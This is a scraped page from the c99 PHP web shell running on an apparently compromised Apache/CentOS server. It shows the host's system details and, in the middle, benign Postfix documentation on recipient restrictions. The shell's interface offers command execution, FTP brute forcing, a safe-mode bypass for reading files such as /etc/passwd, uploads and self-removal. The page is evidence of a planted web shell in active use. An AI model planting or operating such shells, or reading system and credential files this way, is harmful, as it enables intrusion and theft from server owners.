!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postfix/help/   drwxr-xr-x
Free 48.08 GB of 127.8 GB (37.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     opt_smtpd_recipient_restrictions.html (4.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Restrictions on recipient addresses
smtpd_recipient_restrictions

This parameter specifies restrictions on recipient addresses that SMTP clients can send in RCPT TO commands.

These destinations do not need to be listed in $relay_domains.

The following restrictions are available (* is part of default setting):

  • *permit_mynetworks: permit if the client address matches $mynetworks.
  • reject_unknown_client: reject the request if the client hostname is unknown.
  • reject_maps_rbl: reject if the client is listed under $maps_rbl_domains.
  • reject_invalid_hostname: reject HELO hostname with bad syntax.
  • reject_unknown_hostname: reject HELO hostname without DNS A or MX record.
  • reject_unknown_sender_domain: reject sender domain without A or MX record.
  • *check_relay_domains: permit only mail: Reject anything else.
  • permit_auth_destination: permit mail:
  • reject_unauth_destination: reject mail unless it is sent
  • reject_unauth_pipelining: reject mail from improperly pipelining spamware
  • permit_mx_backup: accept mail for sites that list me as MX host.
  • reject_unknown_recipient_domain: reject domains without A or MX record.
  • check_recipient_access maptype:mapname: look up recipient address, parent domain, or localpart@. Reject if result is REJECT or "[45]xx text". Permit otherwise.
  • check_client_access maptype:mapname: see smtpd_client_restrictions.
  • check_helo_access maptype:mapname: see smtpd_helo_restrictions.
  • check_sender_access maptype:mapname: see smtpd_sender_restrictions.
  • reject_non_fqdn_hostname: reject HELO hostname that is not in FQDN form.
  • reject_non_fqdn_sender: reject sender address that is not in FQDN form.
  • reject_non_fqdn_recipient: reject recipient address that is not in FQDN form.
  • reject: reject the request. Place this at the end of a restriction.
  • permit: permit the request. Place this at the end of a restriction.
Restrictions are applied in the order as specified; the first restriction that matches wins.

Specify a list of restrictions, separated by commas and/or whitespace. Continue long lines by starting the next line with whitespace.

NOTE: YOU MUST SPECIFY AT LEAST ONE OF THE FOLLOWING RESTRICTIONS OTHERWISE POSTFIX REFUSES TO RECEIVE MAIL:
reject, check_relay_domains, reject_unauth_destination



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--